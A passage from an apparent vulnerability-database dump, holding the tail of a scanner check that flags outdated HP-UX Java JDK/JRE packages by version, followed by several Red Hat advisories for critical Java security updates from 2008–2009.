ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-12-11T13:32:08", "bulletinFamily": "unix", "description": "The Java Runtime Environment (JRE) contains the software and tools that\nusers need to run applets and applications written using the Java\nprogramming language. \n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute arbitrary\ncode. (CVE-2008-2086)\n\nAdditionally, these packages fix several other critical vulnerabilities.\nThese are summarized in the \"Advance notification of Security Updates for\nJava SE\" from Sun Microsystems.\n\nUsers of java-1.6.0-sun should upgrade to these updated packages, which\ncorrect these issues.", "modified": "2017-07-27T11:46:47", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:1018", "href": "https://access.redhat.com/errata/RHSA-2008:1018", "type": "redhat", "title": "(RHSA-2008:1018) Critical: java-1.6.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:13", "bulletinFamily": "unix", "description": "The Java Runtime Environment (JRE) contains the software and tools that\nusers need to run applets and applications written using the Java\nprogramming language. \n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute arbitrary\ncode. (CVE-2008-2086)\n\nAdditionally, these packages fix several other vulnerabilities. These are\nsummarized in the \"Advance notification of Security Updates for Java SE\"\nfrom Sun Microsystems. \n\nUsers of java-1.5.0-sun should upgrade to these updated packages, which\ncorrect these issues.", "modified": "2017-07-27T11:46:56", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:1025", "href": "https://access.redhat.com/errata/RHSA-2008:1025", "type": "redhat", "title": "(RHSA-2008:1025) Critical: java-1.5.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:31", "bulletinFamily": "unix", "description": "The IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the \"Security Alerts\" from IBM. \n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.", "modified": "2017-09-08T12:08:51", "published": "2009-01-13T05:00:00", "id": "RHSA-2009:0016", "href": "https://access.redhat.com/errata/RHSA-2009:0016", "type": "redhat", "title": "(RHSA-2009:0016) Critical: java-1.5.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:22", "bulletinFamily": "unix", "description": "The IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the \"Security Alerts\" from IBM. \n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR3 Java release.", "modified": "2017-09-08T11:55:57", "published": "2009-01-13T05:00:00", "id": "RHSA-2009:0015", "href": "https://access.redhat.com/errata/RHSA-2009:0015", "type": "redhat", "title": "(RHSA-2009:0015) Critical: java-1.6.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:09", "bulletinFamily": "unix", "description": "The IBM(r) 1.4.2 SR13 Java(TM) release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-2086, CVE-2008-5339, CVE-2008-5340,\nCVE-2008-5342, CVE-2008-5343, CVE-2008-5344, CVE-2008-5345, CVE-2008-5346,\nCVE-2008-5348, CVE-2008-5350, CVE-2008-5351, CVE-2008-5353, CVE-2008-5354,\nCVE-2008-5359, CVE-2008-5360)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13 Java release. All running\ninstances of IBM Java must be restarted for the update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2009-04-23T04:00:00", "id": "RHSA-2009:0445", "href": "https://access.redhat.com/errata/RHSA-2009:0445", "type": "redhat", "title": "(RHSA-2009:0445) Critical: java-1.4.2-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:34", "bulletinFamily": "unix", "description": "The IBM(r) 1.6.0 Java(TM) release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. 